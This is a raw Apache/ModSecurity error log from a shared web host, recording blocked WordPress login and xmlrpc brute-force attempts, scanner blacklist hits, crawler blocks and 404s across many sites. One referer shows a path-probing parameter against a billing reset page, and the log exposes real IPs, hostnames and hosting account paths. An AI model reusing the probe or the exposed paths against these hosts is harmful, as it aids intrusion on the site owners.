[Tue May 26 13:37:08.320426 2026] [security2:error] [pid 536875:tid 537016] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUq-r_-FTveSGlx1HasgAAAJA"]
[Tue May 26 13:37:08.454032 2026] [security2:error] [pid 536875:tid 536999] [remote 88.198.91.116:34374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVUrOr_-FTveSGlx1HawgAA4ns"]
[Tue May 26 13:37:09.850700 2026] [security2:error] [pid 536875:tid 537106] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUrer_-FTveSGlx1Ha4QAAAOo"]
[Tue May 26 13:37:10.370061 2026] [security2:error] [pid 536875:tid 537099] [client 114.119.139.220:49103] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/referanslar/azt-yapi"] [unique_id "ahVUrur_-FTveSGlx1Ha9wAAAOM"], referer: https://www.cagmedya.com/referanslar/index/2
[Tue May 26 13:37:12.410186 2026] [security2:error] [pid 536875:tid 537111] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUsOr_-FTveSGlx1HbGgAAAO8"]
[Tue May 26 13:37:12.833828 2026] [security2:error] [pid 536875:tid 536885] [remote 46.101.217.74:38134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.217.101.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVUsOr_-FTveSGlx1HbJwAAiQk"]
[Tue May 26 13:37:14.652558 2026] [security2:error] [pid 536875:tid 537011] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUsur_-FTveSGlx1HbVwAAAIs"]
[Tue May 26 13:37:16.738584 2026] [security2:error] [pid 536875:tid 537106] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUtOr_-FTveSGlx1HbogAAAOo"]
[Tue May 26 13:37:18.716520 2026] [security2:error] [pid 536875:tid 537088] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUtur_-FTveSGlx1Hb1AAAANg"]
[Tue May 26 13:37:20.229138 2026] [security2:error] [pid 536875:tid 537122] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUt-r_-FTveSGlx1Hb-QAAAPo"]
[Tue May 26 13:37:20.328659 2026] [security2:error] [pid 536875:tid 537091] [client 129.222.147.134:25690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVUuOr_-FTveSGlx1HcAAAAANs"]
[Tue May 26 13:37:20.328877 2026] [security2:error] [pid 536875:tid 537091] [client 129.222.147.134:25690] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVUuOr_-FTveSGlx1HcAAAAANs"]
[Tue May 26 13:37:20.793817 2026] [security2:error] [pid 536875:tid 537128] [client 207.154.223.17:41944] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVUt-r_-FTveSGlx1Hb5gAAAQA"]
[Tue May 26 13:37:21.954609 2026] [fcgid:warn] [pid 536875:tid 537077] (70014)End of file found: [client 66.132.195.56:54498] mod_fcgid: can't get data from http client
[Tue May 26 13:37:22.721032 2026] [security2:error] [pid 536875:tid 537132] [client 103.240.99.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVUuur_-FTveSGlx1HcQwAAAQQ"], referer: https://www.anujtradingco.com/
[Tue May 26 13:37:23.939616 2026] [security2:error] [pid 536875:tid 537028] [client 14.191.76.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUu-r_-FTveSGlx1HcYwAAAJw"]
[Tue May 26 13:37:24.459657 2026] [security2:error] [pid 536875:tid 537125] [client 103.240.99.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVUvOr_-FTveSGlx1HcjAAAAP0"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1285583&moderation-hash=31865e2eb374364faf2c2fe5a871b89f
[Tue May 26 13:37:25.120492 2026] [security2:error] [pid 536875:tid 537109] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUvOr_-FTveSGlx1HclgAAAO0"]
[Tue May 26 13:37:27.059118 2026] [security2:error] [pid 536875:tid 537076] [client 106.192.248.115:58413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVUvur_-FTveSGlx1Hc1AAAAMw"]
[Tue May 26 13:37:27.059301 2026] [security2:error] [pid 536875:tid 537076] [client 106.192.248.115:58413] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVUvur_-FTveSGlx1Hc1AAAAMw"]
[Tue May 26 13:37:27.198068 2026] [security2:error] [pid 536875:tid 537035] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUvur_-FTveSGlx1Hc0gAAAKM"]
[Tue May 26 13:37:27.408838 2026] [security2:error] [pid 536875:tid 537060] [client 62.60.130.231:65484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "adityacreations.co.in"] [uri "/wp-login.php"] [unique_id "ahVUv-r_-FTveSGlx1Hc4AAAALw"]
[Tue May 26 13:37:27.747556 2026] [security2:error] [pid 536875:tid 537006] [client 62.60.130.231:65223] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "adityacreations.co.in"] [uri "/wp-login.php"] [unique_id "ahVUv-r_-FTveSGlx1Hc7wAAAIY"], referer: https://duckduckgo.com/
[Tue May 26 13:37:29.277421 2026] [security2:error] [pid 536875:tid 537038] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUwOr_-FTveSGlx1HdEwAAAKY"]
[Tue May 26 13:37:29.752747 2026] [security2:error] [pid 536875:tid 537121] [client 129.222.147.134:8488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVUwer_-FTveSGlx1HdKgAAAPk"]
[Tue May 26 13:37:29.760884 2026] [security2:error] [pid 536875:tid 537121] [client 129.222.147.134:8488] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVUwer_-FTveSGlx1HdKgAAAPk"]
[Tue May 26 13:37:30.292018 2026] [security2:error] [pid 536875:tid 536997] [remote 74.7.241.58:33576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVUwur_-FTveSGlx1HdOAAA03k"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/wpforms-lite/templates/admin/splash
[Tue May 26 13:37:31.476973 2026] [security2:error] [pid 536875:tid 537015] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUwur_-FTveSGlx1HdSAAAAI8"]
[Tue May 26 13:37:31.703514 2026] [autoindex:error] [pid 536875:tid 537102] [client 15.204.183.221:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:37:32.791030 2026] [security2:error] [pid 536875:tid 537090] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUxOr_-FTveSGlx1HddgAAANo"]
[Tue May 26 13:37:32.881088 2026] [security2:error] [pid 536875:tid 537073] [client 185.191.171.15:22544] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/camp/day/2026-03-30/"] [unique_id "ahVUxOr_-FTveSGlx1HdggAAAMk"]
[Tue May 26 13:37:32.881259 2026] [security2:error] [pid 536875:tid 537073] [client 185.191.171.15:22544] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/camp/day/2026-03-30/"] [unique_id "ahVUxOr_-FTveSGlx1HdggAAAMk"]
[Tue May 26 13:37:33.250518 2026] [security2:error] [pid 536875:tid 537034] [client 103.240.99.165:57048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.99.240.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVUxer_-FTveSGlx1HdhwAAAKI"], referer: https://anujtradingco.com
[Tue May 26 13:37:34.548826 2026] [security2:error] [pid 536875:tid 537106] [client 103.240.99.165:53026] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVUxur_-FTveSGlx1HdtAAAAOo"], referer: https://anujtradingco.com
[Tue May 26 13:37:36.473959 2026] [security2:error] [pid 536875:tid 537048] [client 106.192.248.115:58774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVUyOr_-FTveSGlx1Hd7QAAALA"]
[Tue May 26 13:37:36.474060 2026] [security2:error] [pid 536875:tid 537048] [client 106.192.248.115:58774] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVUyOr_-FTveSGlx1Hd7QAAALA"]
[Tue May 26 13:37:37.056264 2026] [security2:error] [pid 536875:tid 537116] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUyOr_-FTveSGlx1Hd9gAAAPQ"]
[Tue May 26 13:37:38.238705 2026] [security2:error] [pid 536875:tid 537095] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUyer_-FTveSGlx1HeFwAAAN8"]
[Tue May 26 13:37:38.930166 2026] [security2:error] [pid 536875:tid 536962] [remote 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVUyur_-FTveSGlx1HeNAAAvlY"]
[Tue May 26 13:37:38.930340 2026] [security2:error] [pid 536875:tid 537062] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVUyur_-FTveSGlx1HeNAAAvlY"]
[Tue May 26 13:37:39.778964 2026] [security2:error] [pid 536875:tid 537039] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUy-r_-FTveSGlx1HeQwAAAKc"]
[Tue May 26 13:37:40.028434 2026] [security2:error] [pid 536875:tid 537088] [client 129.222.147.134:34088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVUzOr_-FTveSGlx1HeVgAAANg"]
[Tue May 26 13:37:40.028573 2026] [security2:error] [pid 536875:tid 537088] [client 129.222.147.134:34088] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVUzOr_-FTveSGlx1HeVgAAANg"]
[Tue May 26 13:37:41.762094 2026] [security2:error] [pid 536875:tid 537076] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUzer_-FTveSGlx1HecwAAAMw"]
[Tue May 26 13:37:44.151676 2026] [security2:error] [pid 536875:tid 537076] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUz-r_-FTveSGlx1HesQAAAMw"]
[Tue May 26 13:37:45.711781 2026] [security2:error] [pid 536875:tid 537100] [client 212.34.141.234:62651] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "212.34.141.234" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVU0er_-FTveSGlx1He6wAAAOQ"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 13:37:45.711899 2026] [security2:error] [pid 536875:tid 537100] [client 212.34.141.234:62651] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVU0er_-FTveSGlx1He6wAAAOQ"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 13:37:45.817946 2026] [security2:error] [pid 536875:tid 537036] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU0er_-FTveSGlx1He4QAAAKQ"]
[Tue May 26 13:37:47.003712 2026] [security2:error] [pid 536875:tid 537068] [client 106.192.248.115:59064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU0-r_-FTveSGlx1HfCQAAAMQ"]
[Tue May 26 13:37:47.007955 2026] [security2:error] [pid 536875:tid 537068] [client 106.192.248.115:59064] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVU0-r_-FTveSGlx1HfCQAAAMQ"]
[Tue May 26 13:37:47.148721 2026] [security2:error] [pid 536875:tid 537021] [client 223.237.96.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU0ur_-FTveSGlx1HfAgAAAJU"]
[Tue May 26 13:37:47.773128 2026] [security2:error] [pid 536875:tid 537090] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU0-r_-FTveSGlx1HfFQAAANo"]
[Tue May 26 13:37:48.871739 2026] [security2:error] [pid 536875:tid 537031] [client 66.249.64.165:47062] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVU0-r_-FTveSGlx1HfHAAAAJ8"], referer: http://doyecpa.com/prizes/144984420%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 13:37:49.901762 2026] [security2:error] [pid 536875:tid 537055] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU1er_-FTveSGlx1HfUAAAALc"]
[Tue May 26 13:37:50.102522 2026] [security2:error] [pid 536875:tid 537093] [client 142.147.198.235:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVU1er_-FTveSGlx1HfSgAAAN0"]
[Tue May 26 13:37:50.517135 2026] [security2:error] [pid 536875:tid 537074] [client 129.222.147.134:53759] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU1ur_-FTveSGlx1HfbAAAAMo"]
[Tue May 26 13:37:50.517270 2026] [security2:error] [pid 536875:tid 537074] [client 129.222.147.134:53759] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVU1ur_-FTveSGlx1HfbAAAAMo"]
[Tue May 26 13:37:51.908603 2026] [security2:error] [pid 536875:tid 537123] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU1-r_-FTveSGlx1HfjgAAAPs"]
[Tue May 26 13:37:53.157639 2026] [security2:error] [pid 536875:tid 537005] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU2Or_-FTveSGlx1HftwAAAIU"]
[Tue May 26 13:37:53.273332 2026] [security2:error] [pid 536875:tid 537073] [client 193.19.109.24:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVU2Or_-FTveSGlx1HfpAAAyQk"]
[Tue May 26 13:37:54.482432 2026] [security2:error] [pid 536875:tid 536891] [remote 91.210.171.209:40866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.171.210.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVU2ur_-FTveSGlx1Hf3wAAmg8"]
[Tue May 26 13:37:55.180009 2026] [security2:error] [pid 536875:tid 537037] [client 45.81.136.186:50815] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 186.136.81.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVU2ur_-FTveSGlx1Hf8gAAAKU"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 13:37:55.180185 2026] [security2:error] [pid 536875:tid 537037] [client 45.81.136.186:50815] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVU2ur_-FTveSGlx1Hf8gAAAKU"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 13:37:55.596279 2026] [fcgid:warn] [pid 536875:tid 537008] (70014)End of file found: [client 66.132.195.92:25396] mod_fcgid: can't get data from http client
[Tue May 26 13:37:56.068123 2026] [security2:error] [pid 536875:tid 537023] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVU2-r_-FTveSGlx1HgEAAAAJc"]
